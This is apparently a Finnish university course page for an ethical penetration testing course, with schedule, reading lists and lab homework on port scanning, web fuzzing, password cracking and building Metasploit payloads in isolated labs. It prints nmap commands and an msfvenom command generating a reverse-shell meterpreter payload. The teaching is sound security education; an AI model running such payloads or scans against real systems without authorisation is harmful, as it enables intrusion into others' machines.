Tunkeutumistestaus
Penetration Testing course - 2024 late autumn

Learn to hack computers to protect your own. In the course, you will break into target computers.

Update: We have four great visitors coming, check agenda.

Excellent feedback, reached 5.0 out of 5. Full five stars

Course name and codeTunkeutumistestaus ICI001AS3A-3002 (opinto-opas)
Timing2024 period 4 late autumn, w13-w20.
Credits5 cr
ClassesThursdays 14:00 - 16:45, Pasila pa5001, bring your laptop
Max students30
LanguageFinnish (+reading material in English)
RemoteNo, fully contact in Pasila classroom
Feedback5.0 / 5 Excellent feedback* Five star experience
ServicesMoodle: Tunkeutumistestaus, Laksu. Voluntary extra: Tero's list.
First class

* Best instance 5.0/5, every student gave feedback and every feedback was 5. Lowest 4.5/5 excellent, typical 4.9/5 excellent. Use of penetration testing techniques requires legal and ethical considerations. To safely use these tools, tactics and procedures, you might need to obtain contracts and permissions; and posses adequate technical skills. Check your local laws.

Teaching is in Finnish, so the rest of this page will be in Finnish.

Tunkeutumistestaus on eettisen hakkeroinnin kurssi. Opit, miten murtaudutaan tietokoneille, jotta voisit suojata omat ja toimeksiantajan järjestelmät. Nämä tekniikat, ohjelmat ja taktiikat ovat luvallisia vain tietyissä tilanteissa. Usein pitää hankkia lupia ja tehdä sopimuksia. Lisäksi näiden tekniikoiden turvalliseen käyttöön tarvitaan teknistä taitoa. Perehdy itse paikallisiin lakeihin.

Oppimistavoitteet

Opintojakson suoritettuaan opiskelija

  • Tuntee tunkeutumistestauksen prosessin pääpiirteissään
  • Tietää, että tunkeutumistestaukselle on lailliset ja eettiset rajat
  • Osaa kartoittaa kohdejärjestelmän haavoittuvuuksia
  • Osaa hyödyntää valmiita hyökkäyksiä (exploit) ja liittää niihin hyötykuorman käyttäen kurssille valittua työkalua
  • Osaa soveltaa tavallisimpia hyökkäyksiä weppisovelluksia vastaan, kun kohdeohjelmistot ovat helppoja ja haavoittuvia.
  • Osaa hankkia tunkeutumistestauksessa tarvittavia ohjelmistoja

Kurssilta ei saa mukaansa ilmaista pakettia nollapäivähaavoittuvuuksia, eikä kurssi anna mitään erityisoikeuksia eikä ammattinimikkeitä.

Aikataulu

Torstaisin 14:00 - 16:45 Pasila pa5001. Aloitamme 14:00, vaikka joku vierailija tulisikin mukaan myöhemmin.

PäiväAihe
2025-03-27 w13 ThuTunkeutumisen yleiskuva. Järjestäytyminen. Kybertappoketju. 15:00 Vierailija: Riku Juurikko / Head of Preparedness, Elisa: Social Engineering (en).
2025-04-03 w14 ThuAktiivinen tiedustelu. Santeri Siirilä, Cyber Security Consultant, CGI: Hacking the Web. Tero: Porttiskannaus ja oheistekniikat. Valvonta snifferillä.
2025-04-10 w15 Thu14:00 Vierailija: Joona joohoi Hoikkala: Head of Security Testing, Visma: Ffuf & Bit flipping. Tero: Läksyjen tarkastelu ja kertaus: Weppiin murtautuminen.
2025-04-17 w16 ThuSalasanojen murtaminen. Käyttäjien salasanat. Sanakirjahyökkäys. Hashcat. Haittaohjelman käyttö. Msfvenom.
2025-04-24 w17 Thu14:00 Vierailija Nikita Ponomarev: Attacking Active Directory.
2025-05-01 w18 Thu(Vappu, ei opetusta)
2025-05-08 w19 Thu14: Vierailija: Petri idänhurja Maksimainen: Abloy Classic -tiirikointi, työpaja. Weppipalveluihin murtautuminen.
2025-05-15 w20 ThuLipunryöstö, arvioitava laboratorioharjoitus.

Tämä on edistynyt kurssi, joten tuntien aiheisiin voi tulla muutoksia kurssin edetessä.

Kertausmateriaalia

Tämä materiaali on vapaaehtoista, jos osaat ne jo. Lähteet ovat esimerkkejä, voit osata/opetella nuo asiat mistä vain haluat. Esimerkiksi ohjelmoinnin alkeita harjoitella tai osata aivan millä vain kielellä (Python, C...). Jos kurssilla järjestetään alkutesti, kysymykset eivät rajoitu kertauspaketin materiaaliin.

Luettavaa ja linkkejä

€ Maksulliset aineistot saattavat näkyä ilmaiseksi Haaga-Helian tunnuksilla kirjaston kautta. Haaga-Helialla on käyttöoikeus O'Reilly Learning -kirjoihin (ent. Safari).

Työkaluja kurssille

L2 weppihyökkäyksiä - tukee läksyä h2

Yleiskuva, harjoitusmaaleja, web

Aktiivinen tiedustelu. HackTheBox.

Passwords, Learning to Learn tools

Web Fuzzing, Second to Last Words

Metasploit

Läksyt

Palauta linkki Laksuun 24 h ennen seuraavaa lukujärjestykseen merkittyä kurssivarausta. Tehtävät ovat pakollinen ja tärkeä osa kurssia.

Läksyt ovat virallisia vasta, kun ne on vahvistettu (yleensä oppitunnin päätteeksi). Tämä on edistynyt kurssi, joten ohjelmaan tulee yleensä muutoksia kurssin aikana. Osa tehtävistä edellyttää huolellisuuden lisäksi tietoja ja taitoja työkalujen käytöstä, jottei synny vahinkoja - tee vasta, kun tiedät oikeat työtavat.

Läksyt käydään läpi seuraavalla tapaamiskerralla, ratkotaan yhdessä ongelmia ja annetaan suullista palautetta. Arvosana kotitehtäväpaketista tulee vasta kurssin lopuksi, mutta tehtävät tulee silti palauttaa aina vuorokautta ennen seuraavia tunteja. Julkaiseminen on vapaaehtoista, mutta erittäin suositeltavaa. Jos et jostain syystä uskalla tai muuten halua julkaista, voit laittaa työn weppisivulle salasanan taakse (kaikille kotitehtäville sama salasana) ja jakaa tämän salasanan kurssilaisten kanssa. Jos tuntien yhteydessä järjestetään testejä läksyjen aiheista, niiden pisteet sisältyvät arvostelun kohtaan läksyt.

Läksyt pitää tehdä tietokoneella kokeilemalla ja raportoida tapahtumien kulku, ellei kyseisessä alakohdassa erikseen muuta lue. Raportti tulee kirjoittaa samalla, kun työskentelee.

Kaikki käytetyt lähteet tulee merkitä raporttiin: kurssin tehtäväsivu, kurssikavereiden raportit, man-sivut, kirjat. Mikäli tekoälyltä kysyy neuvoa, se on merkittävä lähteeksi. Tekoälyt hallusinoivat, tiedot on suositeltavaa tarkistaa. Tiivistelmiä tai esseitä ei saa generoida tekoälyllä eikä muilla vastaavilla tekniikoilla, vaan ne on kirjoitettava itse.

Tehtäviä saa aloittaa vasta, kun on hyväksynyt kurssin säännöt.

h1 Kybertappoketju

Kill Chain #1: Recon. Porttiskannauksen lisäksi alamme rakentaa hakkerilabraa.

Tehtäviä saa aloittaa vasta, kun on hyväksynyt kurssin säännöt. Koneet on eristettävä Internetistä hyökkäysten harjoittelun ajaksi.

  • x) Lue/katso/kuuntele ja tiivistä. (Tässä x-alakohdassa ei tarvitse tehdä testejä tietokoneella, vain lukeminen tai kuunteleminen ja tiivistelmä riittää. Tiivistämiseen riittää muutama ranskalainen viiva.)
  • a) Asenna Kali virtuaalikoneeseen. (Jos asennuksessa ei ole mitään ongelmia tai olet asentanut jo aiemmin, tarkkaa raporttia tästä alakohdasta ei tarvita. Kerro silloin kuitenkin, mikä versio ja millä asennustavalla. Jos on ongelmia, niin tarkka ja toistettava raportti).
  • b) Irrota Kali-virtuaalikone verkosta. Todista testein, että kone ei saa yhteyttä Internetiin (esim. 'ping 8.8.8.8')
  • c) Porttiskannaa 1000 tavallisinta tcp-porttia omasta koneestasi (nmap -T4 -A localhost). Selitä komennon paramterit. Analysoi ja selitä tulokset.
  • d) Asenna kaksi vapaavalintaista demonia ja skannaa uudelleen. Analysoi ja selitä erot.
  • e) Asenna Metasploitable 2 virtuaalikoneeseen
  • f) Tee koneiden välille virtuaaliverkko. Jos säätelet VirtualBoxista
    • Kali saa yhteyden Internettiin, mutta sen voi laittaa pois päältä
    • Kalin ja Metasploitablen välillä on host-only network, niin että porttiskannatessa ym. koneet on eristetty intenetistä, mutta ne saavat yhteyden toisiinsa
    • Vaihtoehtoisesti voit tehdä molempien koneiden asennuksen ja virtuaaliverkon vagrantilla. Silloin molemmat koneet samaan Vagrantfile:n.
  • g) Etsi Metasploitable porttiskannaamalla (nmap -sn). Tarkista selaimella, että löysit oikean IP:n - Metasploitablen weppipalvelimen etusivulla lukee Metasploitable.
  • h) Porttiskannaa Metasploitable huolellisesti ja kaikki portit (nmap -A -T4 -p-). Poimi 2-3 hyökkääjälle kiinnostavinta porttia. Analysoi ja selitä tulokset näiden porttien osalta.

Vinkkejä

  • Sivun tekeminen wepiin onnistuu helposti Githubilla. Karvinen 2023: Create a Web Page Using Github
  • Podcastien kuunteluun AntennaPod löytyy F-Droid:sta ja Google Play:sta. Tietysti podcasteja voi kuunnella sadoilla muillakin ohjelmilla.
  • Kannattaa lukea Valkamon artikkelista VirtualBox-osuus ennenkuin ryhdyt asentamaan virtuaalikoneita. Valkamo 2022: Hacking into a Target Using Metasploit: Metasploitable
  • Halutessasi voit käyttää myös muita virtualisointiympäristöjä kuin VirtualBoxia, esim Macilla UTM tai Linuxilla virt-manager (libvirt, qemu). Tämä edellyttää toki omaa soveltamista.
  • Virtuaalikoneiisin voi asentaa uusia verkkokortteja vain, kun ne ovat sammuksissa
  • Suosittelen Kaliin 4 GB muistia
  • OffSec Ltd 2023: Prebuilt Virtual Machines
  • Tutustu tarvittaessa itse etsimiisi lähteisiin, kuten man-sivuihin ja ohjelmien dokumentaatioon.
  • Muista laittaa lähdeviitteet. Viittaa joka tehtävästä kurssiin ja kaikkiin muihinkin käyttämiisi lähteisiin.
  • O'Reilly Learning videot ja kirjat pääset lukemaan ilmaiseksi HH tunnuksilla, kun kirjaudut kirjaston Haaga-Helia A-Z kautta.
  • VirtualBoxissa host-only-networking on kätevä. Voit laittaa Kaliin kaksi verkkokorttia, toinen NAT:lla Internetiin ja toinen host-only-network:n. Verkkoasetusten advanced-kohdasta voi vetää virtuaalisen verkkokaapelin irti ja kiinni, vaikka kone on päällä.
  • Jos Metasploitable 2 -maali ei löydy omasta verkosta (arp, arpwatch, netdiscover, nmap -sn...), voit kirjatua sisään (msfadmin:msfadmin) ja 'ifconfig' tai 'ip addr'. Metasploitable 2:n kannattaa laittaa vain yksi "Host only networking" verkkokortti, se ei toimi itsestään kahden verkkokortin kanssa.
  • Kun olet irroittanut Internetin ja valmiina skannaamaan, varmista. Kokeile, että Google tai DuckDuckGo ei aukea selaimella, että et voi pingata esim 8.8.8.8. Kokeile, että maalikoneesi vastaa pingiin. Jos maalikoneella on weppipalvelin, kannattaa katsoa selaimella, että sieltä aukeaa olettamasi sivu.
  • Tietoja verkosta
    • ip a; ifconfig
    • ip route
    • ipcalc 10.0.0.1/24
    • ping 8.8.8.8
  • Ole huolellinen, irrota harjoituskoneet Internetistä skannausten ja hyökkäysten ajaksi. Mitään ulkopuolisia koneita ei saa skannata eikä mihinkään ulkopuolisiin koneisiin saa tunkeutua.
  • Jokin tehtävä voi olla vaikea. Tee ja raportoi silloin kaikki mitä osaat. Listaa lähteet, joista hait ohjeita. Onko jotain vielä kokeiltavana? Mitä haasteita on vielä ratkaisun tiellä? Mitä virheimoituksia tai vastaavia tulee? Voit myös katsoa wepistä esimerkkiratkaisun - muista viitata lähteeseen ja merkitä, missä kohdassa katsoit ratkaisua. Ja katsotaan yhdessä tunnilla loput.
  • Ongelmallisista kohdista raportoidaan erityisen tarkasti, jotta voimme antaa vinkkejä haasteisiin.

h2 Täysin Laillinen Sertifikaatti

Vinkit

  • Firefox ei enää ohjaa proxyyn liikennettä mihinkään 127-alkuiseen IP-osoitteeseen eikä localhostiin. Mutta Foxyproxyn avulla se onnistuu.
  • Zap asennus
  • Proxya voi testata vaikkapa Metasploitablen weppipalveluiden kanssa. Tai asentaa WebGoatin Podmaniin. Tai käyttää läksyn PortSwigger Labsin harjoituksia.
    • Älä tee hyökkäyksiä mihinkään muualle kuin harjoitusmaaleihin
  • ZAP TLS-yhteyksien avaamiseen CA-sertifikaatti
    • Löytyy Tools: Options: Network alta, hakusanaksi "Certificate".
      • Joissain versioissa haku ei suodata listaa, vaan värittää osumat oranssilla. Ja tietysti oikea sertifikaatti on piilossa, niin että pitää klikkaamalla avata listaa. Sertifikaattikohtia on kaksi, tässä turha asiakkaan sertifikaatti ja oikea, tarvittava palvelimen sertifikaatti.
    • Firefoxissa Settings ja hakusanaksi "Certificate"
  • ZAP:n tärkein toiminto: Requester tab.
    • Löytyy historiasta oikeaa nappia painamalla. Myös Ctrl-W.
    • Muokkaa hakupyyntöä ja lähetä. Vastaus näkyy vieresssä. Korjaa ja lähetä uudelleen.
  • ZAP hakupyynnön pysäytys
    • Vain, jos Requester eli saman pyynnön uudelleenlähetys ei toimi.
    • Puussa olevista osoitteista oikeaa nappia, menusta "Break..."
    • Tee pyyntö selaimella
    • Pyyntö näkyy ZAPissa oikealla ylhäällä "Break" välilehdellä.
    • Muokaa pyynnön tekstiä, lähetä eteenpäin yläreunan työkalupallin Play-symbolia klikkaamalla
  • ZAP kuvien sieppaus muistaakseni Options: Display: ...images.
    • Osa tässäkin läksynä olevista harjoituksista edellyttää, että kuvien sieppaus on päällä.
    • Monissa ZAP:n versioissa jättää kokonaan kuvat näyttämättä oletuksena.
  • PortSwiggerin tehtävissä voi käyttää välimiesproxyna ZAP:ia tai MitmProxya. Ei siis tarvitse ostaa noiden harjoitusten tekijän kuuluisaa ohjelmaa.
  • Pencoder - loistava ohjelma stringien muunteluun fuff:n tekijältä. Esim. URLEncode, base64...
    • Pencoder asennus ulkomuistista: hae Github-sivu "fuff pencode", Releases, pencode*linux_amd64.tar.gz, pura paketti, aja valmis binääri, kopioi se /usr/local/bin/.
  • Viittaa
    • Viittasithan kurssiin ja tehtäväsivuun?
    • Viittasithan kaikkiin käyttämiisi artikkeleihin?
    • Viittasithan muiden tehtäväraportteihin, jos käytit lähteenä?
    • Videoihin, man-sivuihin, ohjelmiin, StackOverflowhun...
    • Viittasithan kaikkiin muihinkin lähteisiin?
  • Hakkeroimaan oppii hakkeroimalla.

h3 Fuzzy

Opit käyttämään maailman johtavaa weppifuzzeria: ffuf. Sen opettaa meille tunnilla itse työkalun tekijä, joohoi.

  • x) Lue/katso/kuuntele ja tiivistä. (Tässä x-alakohdassa ei tarvitse tehdä testejä tietokoneella, vain lukeminen tai kuunteleminen ja tiivistelmä riittää. Tiivistämiseen riittää muutama ranskalainen viiva. Lisää mukaan jokin oma idea, huomio, kysymys tai kommentti.)
  • a) Fuzzzz. Ratkaise dirfuz-1 artikkelista Karvinen 2023: Find Hidden Web Directories - Fuzz URLs with ffuf.
  • b) Fuff me. Asenna FuffMe-harjoitusmaali. Karvinen 2023: Fuffme - Install Web Fuzzing Target on Debian
  • Ratkaise ffufme harjoitukset - kaikki paitsi ei "Content Discovery - Pipes".
    • c) Basic Content Discovery
    • d) Content Discovery With Recursion
    • e) Content Discovery With File Extensions
    • f) No 404 Status
    • g) Param Mining
    • h) Rate Limited
    • i) Subdomains - Virtual Host Enumeration

h4 Leviämässä

Nyt levitään! Opit murtamaan salasanoja ja tekemään haittaohjelmia.

Itsenäistä opiskelua: 2025-04-17 w16 torstaina ei ole oppitunteja tällä kurssilla.

Ensi viikolla w17 saamme vierailijan suoraan Tanskasta. Nikita opettaa murtautumista Active Directory -verkkoihin.

  • x) Lue/katso ja tiivistä. (Tässä x-alakohdassa ei tarvitse tehdä testejä tietokoneella, vain lukeminen tai kuunteleminen ja tiivistelmä riittää. Tiivistämiseen riittää muutama ranskalainen viiva kustakin artikkelista. Kannattaa lisätä myös jokin oma ajatus, idea, huomio tai kysymys.)
  • a) Asenna Hashcat ja testaa sen toiminta murtamalla esimerkkisalasana.
  • c) Asenna John the Ripper ja testaa sen toiminta murtamalla jonkin esimerkkitiedoston salasana.
  • e) Tiedosto. Tee itse tai etsi verkosta jokin salakirjoitettu tiedosto, jonka saat auki. Murra sen salaus. (Jokin muu formaatti kuin aiemmissa alakohdissa kokeilemasi).
  • f) Tiiviste. Tee itse tai etsi verkosta salasanan tiiviste, jonka saat auki. Murra sen salaus. (Jokin muu formaatti kuin aiemmissa alakohdissa kokeilemasi. Voit esim. tehdä käyttäjän Linuxiin ja murtaa sen salasanan.)
  • g) Tee msfvenom-työkalulla haittaohjelma, joka soittaa kotiin (reverse shell). Ota yhteys vastaan metasploitin multi/handler -työkalulla.
    • Haittaohjelma ei saa olla automaattisesti leviävä. Msfvenom tekee tyypillisillä asetuksilla ohjelman, joka avaa reverse shellin, kun sen ajaa, mutta joka ei leviä eikä tee muutenkaan mitään itsestään.
    • Raporttiin riittävät pelkät komennot ja raportti haitakkeen tekemisestä, itse binääriä ei ole pakko laittaa verkkoon. Mikäli laitat binäärin verkkoon, pakkaa se salakirjoitettuun zip-pakettiin ja laita salasanaksi "infected". Latauslinkin yhteydessä on oltava selkeä varoitus siitä, että kyseessä on haittaohjelma (malware), jota ei tule ajaa tuotantokoneilla. Salasanan voit halutessasi kertoa varoitusten yhteydessä.
    • Palvelimen päässä pitää olla reikä tulimuurissa. Reverse shell tarkoittaa, että palvelin on hyökkäyskoneella.
  • h) Vapaaehtoinen: Asenna Windows-virtuaalikone ja tee msfvenomilla ohjelma siihen. Itse tykkään Linuxista ja käytän paljon sitä, tässä hieman vaihtelua. Windows-käyttäjät ovat myös usein tottuneet (paketinhallinnan puutteessa) lataamaan ohjelmia weppisivuilta.

Vinkit

  • O'Reilly Learning videot ja kirjat pääset lukemaan ilmaiseksi HH tunnuksilla, kun kirjaudut kirjaston kautta.
  • Irrota tarvittasessa koneet netistä testien ajaksi.
  • Metasploit msfconsole multi/handler
    • laita samat asetukset kuin msfvenom
    • muista 'set payload'
    • 'run -j' ajaa taustalla, sessiot ovat 'sessions'
    • prosessoriarkkitehtuuri kohteen mukaan

Esimerkki ulkomuistista, pitää itse soveltaa

$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8080 -o infected

Adminstrivia: Update 2025-04-16 w16 Wed: Korjasin kieliasua ja ulkoasua, lisäsin linkin HH A-Z, merkkasin maksulliset lukemistot.